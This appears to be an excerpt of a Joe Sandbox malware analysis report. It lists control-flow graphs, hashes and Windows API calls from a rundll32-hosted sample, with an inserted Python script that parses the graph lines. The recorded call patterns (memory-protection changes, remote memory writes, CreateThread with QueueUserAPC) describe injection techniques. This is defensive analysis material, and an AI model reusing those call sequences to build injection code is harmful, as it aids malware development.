                                                          control_flow_graph 228 5225c0-5225ea call 54c930 231 5225f0-522607 call 54887c 228->231 232 522705-52271c 228->232 235 5226f1-5226fd 231->235 236 52260d-522622 231->236 235->232 237 522626-52262a 236->237 238 522648-522655 237->238 239 52262c-522646 237->239 238->235 240 52265b 238->240 239->238 241 52265d-522668 239->241 240->237 241->235 242 52266e-5226a1 CreateFileA 241->242 242->235 243 5226a3-5226b6 SetFilePointer 242->243 244 5226e8-5226eb FindCloseChangeNotification 243->244 245 5226b8-5226d8 ReadFile 243->245 244->235 245->244 246 5226da-5226df 245->246 246->244 247 5226e1-5226e6 246->247 247->244
                                                          APIs
                                                          • CreateFileA.KERNELBASE ref: 00522694
                                                          • SetFilePointer.KERNELBASE ref: 005226AE
                                                          • ReadFile.KERNELBASE ref: 005226D0
                                                          • FindCloseChangeNotification.KERNELBASE ref: 005226EB
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: BoundaryDeleteDescriptorlstrcmp
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00547004: RegCreateKeyA.ADVAPI32(?,?,?,00549153), ref: 00547027
                                                          • RegQueryValueExA.KERNELBASE ref: 0053D4B0
                                                          Strings
                                                          Similarity
                                                          • API ID: CreateQueryValue
                                                          • String ID: ($(
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-0000001F), ref: 0052B803
                                                          • RtlAllocateHeap.NTDLL ref: 0052B825
                                                          • RegQueryValueExA.KERNELBASE ref: 0052B887
                                                          Similarity
                                                          • API ID: QueryValue$AllocateHeap
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: H
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00547340: VirtualProtect.KERNELBASE ref: 00547373
                                                          • VirtualProtect.KERNELBASE ref: 00521C59
                                                          • VirtualProtect.KERNELBASE ref: 00521C7C
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • StrRChrA.KERNELBASE ref: 0052BC73
                                                          • RtlAddVectoredContinueHandler.NTDLL ref: 0052BD67
                                                          Similarity
                                                          • API ID: ContinueHandlerVectored
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,00018944,00538F1E,?,?,?,?,?,?,0000007E,0052F548), ref: 00538A6C
                                                          • RegCloseKey.KERNELBASE ref: 00538AEF
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,00531105), ref: 005486B6
                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,00531105), ref: 00548723
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(?,?,?,00549153), ref: 00547027
                                                          • RegOpenKeyA.ADVAPI32(?,?,?,00549153), ref: 00547034
                                                          Similarity
                                                          • API ID: CreateOpen
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Similarity
                                                          • API ID: CreateQueueThreadUser
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlDeleteBoundaryDescriptor.NTDLL ref: 0053B5F6
                                                          Similarity
                                                          • API ID: BoundaryDeleteDescriptor
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlDeleteBoundaryDescriptor.NTDLL ref: 00549042
                                                          Similarity
                                                          • API ID: BoundaryDeleteDescriptor
                                                          • String ID:
                                                          • API String ID: 3203483114-0
                                                          • Opcode ID: 25955b6b7d28094b430422e93eae0a524a3ca9d0a0a5b5ac335d12c466232b15
                                                          • Instruction ID: 7bb98f0e2267dfde3f8a7e2a13d5d65f4f500eebe3b77850ebf3fe3356f9b5b6
                                                          • Opcode Fuzzy Hash: 25955b6b7d28094b430422e93eae0a524a3ca9d0a0a5b5ac335d12c466232b15
                                                          • Instruction Fuzzy Hash: B5218631718A4C8FE798EF68E88E66A77D1F799310F10456DE54FC3252DE28EC468781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE ref: 00524A08
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: 8db922fd9091025d917ee3fa5b9b8cb8437445c7be8339cafab69875c143e589
                                                          • Instruction ID: 55bf2683286b30389cee8f5c52c295e281500c30d315125745737d198c90b7cd
                                                          • Opcode Fuzzy Hash: 8db922fd9091025d917ee3fa5b9b8cb8437445c7be8339cafab69875c143e589
                                                          • Instruction Fuzzy Hash: 0A215931218B598FEB95EF28D888A6A7BE5FBA8301B11152EE50AC3260DB34D9448B40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 61193fbb3c11a6377def257641601a12032aaed3a0883b3445c2989be8d24a87
                                                          • Instruction ID: 803befb77053983d9a227e58e16aa3ca2a31e2896fd05ea2e5188b8c4f02e254
                                                          • Opcode Fuzzy Hash: 61193fbb3c11a6377def257641601a12032aaed3a0883b3445c2989be8d24a87
                                                          • Instruction Fuzzy Hash: 0811513160CB0D8FAB14EF59E445469B7E5F79C311B104A3EEC8BC3245EE70E9058B86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00526D24: NtWriteVirtualMemory.NTDLL ref: 00526D43
                                                          • VirtualProtectEx.KERNELBASE ref: 00524A9C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: Virtual$MemoryProtectWrite
                                                          • String ID:
                                                          • API String ID: 1789425917-0
                                                          • Opcode ID: dc2d7a55bae03b42cae034855de4c2d582e22b98317ece67652a204506ff4dc2
                                                          • Instruction ID: 2123101c8b36935f2a2ffcc6759df390a776356aa3370e6378ded8c4342cac89
                                                          • Opcode Fuzzy Hash: dc2d7a55bae03b42cae034855de4c2d582e22b98317ece67652a204506ff4dc2
                                                          • Instruction Fuzzy Hash: F6011A70A18B088FCB48EF59E0C9525B7E0FB98311B50456EE94DC7296DB70D945CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: InformationQueryToken$Close
                                                          • String ID: 0
                                                          • API String ID: 459398573-4108050209
                                                          • Opcode ID: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                                                          • Instruction ID: 867f810a698fdd7f98b7471aea1812263cb63a690b98898c6640fc8240f34267
                                                          • Opcode Fuzzy Hash: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                                                          • Instruction Fuzzy Hash: CD415A71208B488FD764EF29D8C9B9AB7E5FBD9301F50492EE48EC7250DB349945CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateUser$MutexNameQueueThread
                                                          • String ID:
                                                          • API String ID: 2503873790-0
                                                          • Opcode ID: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                                                          • Instruction ID: 28a96bec220ae877eaa956faf93b0661cf0a5e2c925fc40efcc265e866fa8a65
                                                          • Opcode Fuzzy Hash: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                                                          • Instruction Fuzzy Hash: 6172B37561DB08CFE768EF28EC8A6A573E1F795305F20452ED48BC71A1DE3898478B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.471281896.000001572396F000.00000040.80000000.00040000.00000000.sdmp, Offset: 000001572396F000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_1572396f000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 763bc2c334054d482c1953eee1de521cfec9c824c408ccc28d3490dde02b6101
                                                          • Instruction ID: 5a82c0069041076172cc768f3d3f0b42f918df4f2b5654fb8f6575dad553b4c5
                                                          • Opcode Fuzzy Hash: 763bc2c334054d482c1953eee1de521cfec9c824c408ccc28d3490dde02b6101
                                                          • Instruction Fuzzy Hash: 2BB1E53121DF888FD764DE18DC86BE5B3E1FB96305F54456DD4CBCB282D634A4468B42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateHeap
                                                          • String ID:
                                                          • API String ID: 10892065-0
                                                          • Opcode ID: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                                                          • Instruction ID: 14f10dc935aff8035190e4558b066a715e17e9d37226b8c86287397b9ed6b3d7
                                                          • Opcode Fuzzy Hash: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                                                          • Instruction Fuzzy Hash: 05919470618E098FF768EF28EC997A933D5EB95316F204129D58BC72A1EE78D8428741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                                                          • Instruction ID: 5a087ab223cd0308c069168d9260a046d9ed34d642264bfdaac4664796da2ce9
                                                          • Opcode Fuzzy Hash: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                                                          • Instruction Fuzzy Hash: 4A014F30218E0D8FEB95EF68E9C9B6673E4FBA930AF40016EA449C7194D634D885CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: BoundaryDeleteDescriptorlstrcmp
                                                          • String ID:
                                                          • API String ID: 735288309-3916222277
                                                          • Opcode ID: e550695b4b61958b2117182ed079959755ec0d1867ab0c412c5e6705c87392a7
                                                          • Instruction ID: 89117256aeea8e6249316254b9c3c7be9bb7184c8565ff289f3daa7550330b0c
                                                          • Opcode Fuzzy Hash: e550695b4b61958b2117182ed079959755ec0d1867ab0c412c5e6705c87392a7
                                                          • Instruction Fuzzy Hash: C651297161CE448BE7287E18AC8B2B973D5E3CA316F14013ED9DAC72E1D9349C534B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0000015723957004: RegCreateKeyA.ADVAPI32(?,?,?,0000015723959153), ref: 0000015723957027
                                                          • RegQueryValueExA.KERNELBASE ref: 000001572394D4B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateQueryValue
                                                          • String ID: ($(
                                                          • API String ID: 2711935003-222463766
                                                          • Opcode ID: 7039fa200ef29c184f5b10477ca8e5680abadd57b94e265f504d8aab6c8d6b78
                                                          • Instruction ID: a126a6aaf64304dbf06f302a7acc19670d3cb0f7bf0a4b850267ea67042b2d09
                                                          • Opcode Fuzzy Hash: 7039fa200ef29c184f5b10477ca8e5680abadd57b94e265f504d8aab6c8d6b78
                                                          • Instruction Fuzzy Hash: 7541A274618B48CFF748DF18EC996A673E1F799309F00812AD58AC32A1DF78DA45CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: H
                                                          • API String ID: 1029625771-2852464175
                                                          • Opcode ID: 6cc38ccaa850b681befee8090efae8b1f89e5c4c5265d701e1b2086e5fd9da55
                                                          • Instruction ID: 9f994a2854622c6634b3d3e61be1a96076b973d50986e480f11420a4e0208a0b
                                                          • Opcode Fuzzy Hash: 6cc38ccaa850b681befee8090efae8b1f89e5c4c5265d701e1b2086e5fd9da55
                                                          • Instruction Fuzzy Hash: F1A16130508F0A8FEB55DF58E88D7A677E5FB99316F00462ED489C71A1EB35D881CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 82c18c6e6fa7bbc15f18fe96c22df7e925fd8627ec72f289340420d94a56c73c
                                                          • Instruction ID: 492ffcd243a2ccc3aff9afc1226362d1968b99c25f3c8123a6a5d17a211c8c39
                                                          • Opcode Fuzzy Hash: 82c18c6e6fa7bbc15f18fe96c22df7e925fd8627ec72f289340420d94a56c73c
                                                          • Instruction Fuzzy Hash: 37615070618F098FE754EF19E88A765B7E1FB99305F10056EE48EC72A1DB34E941CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ContinueHandlerVectored
                                                          • String ID:
                                                          • API String ID: 3758255415-0
                                                          • Opcode ID: ebbe6ac522210a9cbc442d0fb8ea88652477f683457ebd90c6720f1d0b0afe41
                                                          • Instruction ID: bea7c887ae4e6e82779e38123311d6774180bd06d4a1ad54fbf3b857c2cb3c5d
                                                          • Opcode Fuzzy Hash: ebbe6ac522210a9cbc442d0fb8ea88652477f683457ebd90c6720f1d0b0afe41
                                                          • Instruction Fuzzy Hash: 7751A471608E05CFFBA4EF28AC497BA77D1EBD9306F1541299496C72E1DB7CC9028B41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Basic blocks: 475 (15723958678-157239586c0, calls RegQueryValueExA), 476 (15723958720-15723958743, calls RegCloseKey), 477 (157239586c2-157239586db), 479 (1572395871b), 480 (157239586dd-157239586ff), 482 (15723958707-15723958719), 483 (15723958701-15723958705)
                                                          • Edges: 475->476, 475->477, 477->479, 477->480, 479->476, 480->482, 480->483, 482->476, 483->476
                                                          APIs
                                                          • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,0000015723941105), ref: 00000157239586B6
                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,0000015723941105), ref: 0000015723958723
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: e3553bd799da92a9375b92d556bb2138d0cd29b9e71b71758a3b13e3e8479367
                                                          • Instruction ID: fb968defe4d319f50bcb35e781735560a44e74386416153da676806a9ee9d0d3
                                                          • Opcode Fuzzy Hash: e3553bd799da92a9375b92d556bb2138d0cd29b9e71b71758a3b13e3e8479367
                                                          • Instruction Fuzzy Hash: AB214F3061CA088FE758EF2CE84D666B7E1FB98355F10446EE48AC3661DB34E981CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateOpen
                                                          • String ID:
                                                          • API String ID: 436179556-0
                                                          • Opcode ID: e4419606d2f704daf9ddf2ecf459e8c6152cdf4d5e5403aeff81dd609e706585
                                                          • Instruction ID: 34e989ad331575051bd1bbd48da416aacabcd502fcbc59687bac9dea9766eee7
                                                          • Opcode Fuzzy Hash: e4419606d2f704daf9ddf2ecf459e8c6152cdf4d5e5403aeff81dd609e706585
                                                          • Instruction Fuzzy Hash: 4E11A53160CA088FDB94DB5C9449769B7E1EBE9355F10046EE989C32A1DA75C9848B42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Basic blocks: 495 (157239526bc-157239526f8, calls CreateThread), 496 (157239526fa-1572395270b, calls QueueUserAPC), 497 (15723952733-15723952745), 498 (1572395270d-1572395272b)
                                                          • Edges: 495->496, 495->497, 496->497, 496->498, 498->497
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateQueueThreadUser
                                                          • String ID:
                                                          • API String ID: 3600083758-0
                                                          • Opcode ID: 1042369a62fa130813053ba96abf502003b5e90ec07148417e067b6cd7aabf44
                                                          • Instruction ID: 462b30ac46ea73e02f822ad1b8a856a40ee8a286424e6134db79524e17d6b2e3
                                                          • Opcode Fuzzy Hash: 1042369a62fa130813053ba96abf502003b5e90ec07148417e067b6cd7aabf44
                                                          • Instruction Fuzzy Hash: 68018030718E088FEB84EFADA85D729B7E2E7A8312F14406AE409C3260CF38DC41C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: abe52cca80897bf381d4248daf34a54796b032552c6d90c33958d84888dac85f
                                                          • Instruction ID: f7ff8b0848fab43b29071d6779f3dde1ba9386a04deab1fd44f283abe6e6d22f
                                                          • Opcode Fuzzy Hash: abe52cca80897bf381d4248daf34a54796b032552c6d90c33958d84888dac85f
                                                          • Instruction Fuzzy Hash: 47616A3161CE05DFE794EF28E88A6A573E0FB99315F50456EE88EC7291DB34E8418BC1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: BoundaryDeleteDescriptor
                                                          • String ID:
                                                          • API String ID: 3203483114-0
                                                          • Opcode ID: db30e70d32ecff436d382c0cc0cbe0bcce1e7c4dde14a7d37afc866764c18652
                                                          • Instruction ID: ee46c951fc4133722e4307caa49cfff33df05ebe13be847f564fa0fa556decef
                                                          • Opcode Fuzzy Hash: db30e70d32ecff436d382c0cc0cbe0bcce1e7c4dde14a7d37afc866764c18652
                                                          • Instruction Fuzzy Hash: EA41AE30658E1C8FFB54EF68EC8AAE5B3D1F79A315F504519E08ACB2A1D624D845C781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Basic blocks: 633 (1572393495c-1572393497f), 634 (157239349c8-157239349ca), 635 (15723934981-157239349c6), 636 (157239349cc-157239349e0), 637 (157239349e6-157239349e9), 638 (15723934a0e-15723934a21), 639 (157239349eb-15723934a03), 644 (15723934a05-15723934a08, calls FindCloseChangeNotification)
                                                          • Edges: 633->634, 633->635, 634->636, 634->637, 635->634, 635->638, 636->637, 637->638, 637->639, 639->638, 639->644, 644->638
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: 8db922fd9091025d917ee3fa5b9b8cb8437445c7be8339cafab69875c143e589
                                                          • Instruction ID: e1b77489caf1832c0a66fa986bedf53ee265f4bf8223f11679954aec4478f16a
                                                          • Opcode Fuzzy Hash: 8db922fd9091025d917ee3fa5b9b8cb8437445c7be8339cafab69875c143e589
                                                          • Instruction Fuzzy Hash: A621593120CF498FEB95EF28D889B6A77E4FBE9305F11052DE54AC72A0DB38D9448B40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
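Joe Sandbox serializes each function's graph as one `control_flow_graph` text line: basic blocks as `<id> <start>[-<end>]`, the API a block calls written directly after its address range, and `src->dst` edges. The Python below is an added example (not part of this report and not Joe Sandbox code) that parses such a line and enumerates the API-call order along every simple path from the entry block; that is the quick check for whether CreateThread really precedes QueueUserAPC on every path through the function, or whether a RegQueryValueExA is always paired with RegCloseKey. The embedded input is the raw line for the CreateThread/QueueUserAPC function in this section; the token rules (short decimal block ids, lowercase hex addresses of at least eight digits) are assumptions inferred from the report's lines, not a documented grammar.

```python
import re
from dataclasses import dataclass, field

# Raw graph line copied from this report (the CreateThread/QueueUserAPC
# function); it is the input the example runs on, not a constructed value.
CFG_LINE = (
    "control_flow_graph 495 157239526bc-157239526f8 CreateThread "
    "496 157239526fa-1572395270b QueueUserAPC 495->496 "
    "497 15723952733-15723952745 495->497 496->497 "
    "498 1572395270d-1572395272b 496->498 498->497"
)

# Token shapes inferred from the report's lines (an assumption, not a
# documented Joe Sandbox grammar): block ids are short decimal integers,
# addresses are lowercase hex of at least eight digits, edges are "src->dst".
_NODE_ID = re.compile(r"^\d{1,6}$")
_RANGE = re.compile(r"^([0-9a-f]{8,})(?:-([0-9a-f]{8,}))?$")
_EDGE = re.compile(r"^(\d+)->(\d+)$")


@dataclass
class Block:
    node_id: int
    start: int          # first instruction address
    end: int            # last instruction address (== start for one-address blocks)
    apis: list = field(default_factory=list)   # API calls made from this block


@dataclass
class Cfg:
    blocks: dict        # node_id -> Block
    edges: list         # (src, dst) pairs


def parse_cfg(line):
    """Parse one 'control_flow_graph ...' line into blocks and edges."""
    tokens = line.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    blocks, edges, current = {}, [], None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        em = _EDGE.match(tok)
        if em:
            edges.append((int(em.group(1)), int(em.group(2))))
            i += 1
            continue
        if _NODE_ID.match(tok) and i + 1 < len(tokens):
            rm = _RANGE.match(tokens[i + 1])
            if rm:
                start = int(rm.group(1), 16)
                end = int(rm.group(2), 16) if rm.group(2) else start
                current = Block(int(tok), start, end)
                blocks[current.node_id] = current
                i += 2
                continue
        # Anything else is an API name annotating the most recent block.
        if current is None:
            raise ValueError(f"API name {tok!r} appears before any block")
        current.apis.append(tok)
        i += 1
    for src, dst in edges:
        if src not in blocks or dst not in blocks:
            raise ValueError(f"edge {src}->{dst} references an unknown block")
    return Cfg(blocks, edges)


def entry_block(cfg):
    """The block no edge points to, i.e. the function's entry."""
    targets = {dst for _, dst in cfg.edges}
    roots = [b for b in cfg.blocks if b not in targets]
    if len(roots) != 1:
        raise ValueError(f"expected one entry block, found {roots}")
    return roots[0]


def api_paths(cfg):
    """API-call sequences along every simple path from the entry to a leaf,
    so the order in which calls can actually occur is visible."""
    succ = {}
    for src, dst in cfg.edges:
        succ.setdefault(src, []).append(dst)
    found = set()

    def walk(node, seen, apis):
        apis = apis + cfg.blocks[node].apis
        nxt = [n for n in succ.get(node, []) if n not in seen]
        if not nxt:                     # leaf, or only back-edges left
            found.add(tuple(apis))
            return
        for n in nxt:
            walk(n, seen | {n}, apis)

    start = entry_block(cfg)
    walk(start, {start}, [])
    return sorted(found)


if __name__ == "__main__":
    cfg = parse_cfg(CFG_LINE)
    for node_id, blk in sorted(cfg.blocks.items()):
        print(f"block {node_id}: {blk.start:x}-{blk.end:x} {' '.join(blk.apis)}")
    for seq in api_paths(cfg):
        print("path:", " -> ".join(seq) or "(no API calls)")
```

Run as a script it lists the four blocks and the two possible call sequences for that function (CreateThread alone on the early-exit path, CreateThread then QueueUserAPC on the others). `parse_cfg` raises on an edge that names a block the line never defines, which is the first thing to check when a graph line has been truncated by copy-and-paste.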

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
